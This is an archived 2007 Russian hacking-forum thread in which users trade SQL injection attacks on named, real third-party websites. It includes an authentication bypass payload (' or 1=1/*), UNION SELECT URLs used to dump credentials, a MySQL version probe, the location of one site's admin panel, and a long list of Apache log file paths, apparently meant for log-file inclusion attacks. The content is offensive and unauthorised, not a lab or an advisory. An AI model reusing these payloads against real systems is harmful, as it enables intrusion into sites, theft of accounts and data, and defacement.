19.12.2007, 22:12
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.
Эээ..разобрался! 
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. 
Последний раз редактировалось Ershik; 19.12.2007 в 22:31..
|
|
|
19.12.2007, 22:43
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Ershik
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.
Эээ..разобрался!
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. Ну вот, пользуйся на здоровье  А админа все же найди!
|
|
|
|
19.12.2007, 22:42
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
на ловушку легко можно проверить подставиви например ' or 999=999/*
|
|
|
|
20.12.2007, 11:13
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Гхм. Нашел.
Админ - halbot
Авторизовался как halbot : 'or 1=1/*
А как ' or 999=999/* Не получилось.
Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все.
Акк админа то есть, но входа в админку там нет.
|
|
|
|
20.12.2007, 21:24
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
|
|
|
|
21.12.2007, 02:22
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Не могу раскрутить =\ :
Код HTML:
Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41
(http://www.evreimir.com/article.php?id=-12032&res=1)
Кроме этого:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? 
Последний раз редактировалось ~EviL~; 21.12.2007 в 02:30..
|
|
|
|
21.12.2007, 16:26
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от ~EviL~
http://www.evreimir.com/article.php?id=-12032&res=1
у меня вобще не загружается
Сообщение от ~EviL~
Кроме этого:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3
в третьей ветке не предусмотрено использование конструкции union select
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.12.2007, 15:28
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
http://www.tymoshchuk.com/priv/index.php
в админке ни чего интересного..
PS
задефейсиш - запинаю.
|
|
|
|
22.12.2007, 12:08
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
|
|
|
|
24.12.2007, 10:21
|
|
Новичок
Регистрация: 06.12.2007
Сообщений: 11
С нами:
9699672
Репутация:
30
|
|
Сообщение от AFoST
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
Вот возможные пути.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
